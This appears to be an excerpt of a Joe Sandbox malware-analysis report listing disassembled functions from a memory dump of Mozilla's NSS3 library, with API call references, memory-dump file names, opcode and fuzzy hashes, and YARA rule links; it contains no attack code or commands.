                                                                                                                                                                                                                            Function 6CBEEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CBD7FFA,?,6CBD9767,?,8B7874C0,0000A48E), ref: 6CBEEDD4
                                                                                                                                                                                                                            • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CBD7FFA,?,6CBD9767,?,8B7874C0,0000A48E), ref: 6CBEEDFD
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,00000000,00000000,6CBD7FFA,?,6CBD9767,?,8B7874C0,0000A48E), ref: 6CBEEE14
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,6CBD9767,00000000,00000000,6CBD7FFA,?,6CBD9767,?,8B7874C0,0000A48E), ref: 6CBEEE33
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3903481028-0
                                                                                                                                                                                                                            • Opcode ID: 4392ba7bd14142785303a3c153d29995816e9f733faf13a05767c513917e1c2f
                                                                                                                                                                                                                            • Instruction ID: 2bdc8526763e6bd92ee5abcef683a62b7f2274e19f49b1ff050f6c036a4eec51
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4392ba7bd14142785303a3c153d29995816e9f733faf13a05767c513917e1c2f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB11C6B1A00796ABEB509E65DC84B4AB3A8EF0C79DF204535E91982A40F331F464C7E3
                                                                                                                                                                                                                            Function 6CB88DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 284873373-0
                                                                                                                                                                                                                            • Opcode ID: 10e216c20624683ab044cf5ef9997be885af4dd7938682ade46eb4e814c063e0
                                                                                                                                                                                                                            • Instruction ID: b8c7d6435e528886e275fe8effb78485c01d55ddefbf8b35e199627910143697
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10e216c20624683ab044cf5ef9997be885af4dd7938682ade46eb4e814c063e0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6115E71A05A559FD700AF78D4885AABBF4FF05315F014969DC88D7B00E731E994CBE2
                                                                                                                                                                                                                            Function 6CC0AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CBF5F17,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CC0AC94
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CBF5F17,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CC0ACA6
                                                                                                                                                                                                                            • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CC0ACC0
                                                                                                                                                                                                                            • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CC0ACDB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3989322779-0
                                                                                                                                                                                                                            • Opcode ID: a721327d5dc03c9f0a2a39475be6a909b5471e8677e0fe115898d3d1187fab6f
                                                                                                                                                                                                                            • Instruction ID: 5816a3ccfae768ccd08d51e25325d7cac6c80b569f23d5744aaa5b23d15d1329
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a721327d5dc03c9f0a2a39475be6a909b5471e8677e0fe115898d3d1187fab6f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C018CB1B01B019BE750DF69D908747B7E8BF40699B104839D85AD3A00E732E054CB90
                                                                                                                                                                                                                            Function 6CB71DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CB71DFB
                                                                                                                                                                                                                              • Part of subcall function 6CB695B0: TlsGetValue.KERNEL32(00000000,?,6CB800D2,00000000), ref: 6CB695D2
                                                                                                                                                                                                                              • Part of subcall function 6CB695B0: EnterCriticalSection.KERNEL32(?,?,?,6CB800D2,00000000), ref: 6CB695E7
                                                                                                                                                                                                                              • Part of subcall function 6CB695B0: PR_Unlock.NSS3(?,?,?,?,6CB800D2,00000000), ref: 6CB69605
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3 ref: 6CB71E09
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC290AB
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC290C9
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: EnterCriticalSection.KERNEL32 ref: 6CC290E5
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC29116
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: LeaveCriticalSection.KERNEL32 ref: 6CC2913F
                                                                                                                                                                                                                              • Part of subcall function 6CB6E190: PR_EnterMonitor.NSS3(?,?,6CB6E175), ref: 6CB6E19C
                                                                                                                                                                                                                              • Part of subcall function 6CB6E190: PR_EnterMonitor.NSS3(6CB6E175), ref: 6CB6E1AA
                                                                                                                                                                                                                              • Part of subcall function 6CB6E190: PR_ExitMonitor.NSS3 ref: 6CB6E208
                                                                                                                                                                                                                              • Part of subcall function 6CB6E190: PL_HashTableRemove.NSS3(?), ref: 6CB6E219
                                                                                                                                                                                                                              • Part of subcall function 6CB6E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB6E231
                                                                                                                                                                                                                              • Part of subcall function 6CB6E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB6E249
                                                                                                                                                                                                                              • Part of subcall function 6CB6E190: PR_ExitMonitor.NSS3 ref: 6CB6E257
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB71E37
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3 ref: 6CB71E4A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 499896158-0
                                                                                                                                                                                                                            • Opcode ID: c39724b13b1020d56a49022bd38450c62b2cd59ae6d63e8f3b33bdeff18d39c7
                                                                                                                                                                                                                            • Instruction ID: f693f271ecb47a758d6d1d6cc0b20539d5e28832e5b4a0c58986cc8f0d0b4acb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c39724b13b1020d56a49022bd38450c62b2cd59ae6d63e8f3b33bdeff18d39c7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B017CB1B4019097EB209B29EC11F4677B4AB41B48F180031ED2C96A91E731E914CBB6
                                                                                                                                                                                                                            Function 6CC0AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?,6CBF5D40,00000000,?,?,6CBE6AC6,6CBF639C), ref: 6CC0AC2D
                                                                                                                                                                                                                              • Part of subcall function 6CBAADC0: TlsGetValue.KERNEL32(?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE10
                                                                                                                                                                                                                              • Part of subcall function 6CBAADC0: EnterCriticalSection.KERNEL32(?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE24
                                                                                                                                                                                                                              • Part of subcall function 6CBAADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CB8D079,00000000,00000001), ref: 6CBAAE5A
                                                                                                                                                                                                                              • Part of subcall function 6CBAADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE6F
                                                                                                                                                                                                                              • Part of subcall function 6CBAADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE7F
                                                                                                                                                                                                                              • Part of subcall function 6CBAADC0: TlsGetValue.KERNEL32(?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEB1
                                                                                                                                                                                                                              • Part of subcall function 6CBAADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEC9
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?,6CBF5D40,00000000,?,?,6CBE6AC6,6CBF639C), ref: 6CC0AC44
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CBF5D40,00000000,?,?,6CBE6AC6,6CBF639C), ref: 6CC0AC59
                                                                                                                                                                                                                            • free.MOZGLUE(8CB6FF01,6CBE6AC6,6CBF639C,?,?,?,?,?,?,?,?,?,6CBF5D40,00000000,?,6CBFAAD4), ref: 6CC0AC62
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1595327144-0
                                                                                                                                                                                                                            • Opcode ID: 1376d080c3a2a803248cb8474f939fc0d8af668f8571998b1acb6e81a2a539b3
                                                                                                                                                                                                                            • Instruction ID: b27e6d7f2b31cdc1d47b80b1e0c9e22cc91ed050bcdc249a311029beb2a2693f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1376d080c3a2a803248cb8474f939fc0d8af668f8571998b1acb6e81a2a539b3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96014FB5A002109FDB00DF65E8C0B5677A8EF44B58F198068E9899F706E732E845CFB1
                                                                                                                                                                                                                            Function 6CBBFD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CB69003,?), ref: 6CBBFD91
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(A4686CBC,?), ref: 6CBBFDA2
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,12D068C3,A4686CBC,?,?), ref: 6CBBFDC4
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?), ref: 6CBBFDD1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2335489644-0
                                                                                                                                                                                                                            • Opcode ID: 44f53ae199ffa5be66bfc2d9776e0b32b5ed118b2ba8baf11a5714017f2f54e4
                                                                                                                                                                                                                            • Instruction ID: 1617eb659e7c0d40a9755970fec25f47e6dd165f4e55dc4ce91fe4a4dafc3f9f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44f53ae199ffa5be66bfc2d9776e0b32b5ed118b2ba8baf11a5714017f2f54e4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AEF0FCFE6012925BEB004F95EC80937B768EF54299B148034ED199BB01EB71D814C7E3
                                                                                                                                                                                                                            Function 6CC7CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2988086103-0
                                                                                                                                                                                                                            • Opcode ID: 8130a3c25930976a18b62c27d0e3dbbe3912aa6b472a0ff20f967dc6b304797d
                                                                                                                                                                                                                            • Instruction ID: 67475be92497bace57bb8777afe2a53dfa5829b74cb33632d7958c778e95a205
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8130a3c25930976a18b62c27d0e3dbbe3912aa6b472a0ff20f967dc6b304797d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81E06DB6700608AFCA10EFA8DC88C8B77BCEE8A2713150525EA91D3700D232F905CBE5
                                                                                                                                                                                                                            Function 6CB59DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_value_text.NSS3 ref: 6CB59E1F
                                                                                                                                                                                                                              • Part of subcall function 6CB113C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6CAE2352,?,00000000,?,?), ref: 6CB11413
                                                                                                                                                                                                                              • Part of subcall function 6CB113C0: memcpy.VCRUNTIME140(00000000,6CAE2352,00000002,?,?,?,?,6CAE2352,?,00000000,?,?), ref: 6CB114C0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • ESCAPE expression must be a single character, xrefs: 6CB59F78
                                                                                                                                                                                                                            • LIKE or GLOB pattern too complex, xrefs: 6CB5A006
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcpysqlite3_value_textstrlen
                                                                                                                                                                                                                            • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                                                                                                            • API String ID: 2453365862-264706735
                                                                                                                                                                                                                            • Opcode ID: aff1a00f06e244f964e810c5f011dd99c3f5f1f7e2b13ed9f860c42dadd7b907
                                                                                                                                                                                                                            • Instruction ID: 2a325a3f309adddf48dc9768dd440a48b7860a68987bbaced18723ee3b9de9ac
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aff1a00f06e244f964e810c5f011dd99c3f5f1f7e2b13ed9f860c42dadd7b907
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56812DB0E043914BDB00CF25C0903AEB7F2EF45318F588659D8A59BB85D736E857C791
                                                                                                                                                                                                                            Function 6CBB4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CBB4D57
                                                                                                                                                                                                                            • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CBB4DE6
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorR_snprintf
                                                                                                                                                                                                                            • String ID: %d.%d
                                                                                                                                                                                                                            • API String ID: 2298970422-3954714993
                                                                                                                                                                                                                            • Opcode ID: c5e15cb99325d79c0a8a29633c930044ade431ef3a75b2feba247163be736cab
                                                                                                                                                                                                                            • Instruction ID: 55bbad51024cad66830ff9329117f72949a32bdb50a6e24469b9d18044a7d44f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5e15cb99325d79c0a8a29633c930044ade431ef3a75b2feba247163be736cab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C931DEB2D042696BEB109B659C05BFF7778EF41308F050469ED1567781EF709D05CBA2
                                                                                                                                                                                                                            Function 6CBC0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$calloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3339632435-0
                                                                                                                                                                                                                            • Opcode ID: 85a80a9fb3d7511a88f7035b2a14c54e81ce0a416ba0b9dd2dca32b7efe9b183
                                                                                                                                                                                                                            • Instruction ID: aeface81ef8f096e5a3cc474d8222d7d6d274d851ae04183de601309de5063be
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85a80a9fb3d7511a88f7035b2a14c54e81ce0a416ba0b9dd2dca32b7efe9b183
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11319EB0F843D68FDB00AF7CE5842697BB4FF06308F114669D89887A11EB349095CB83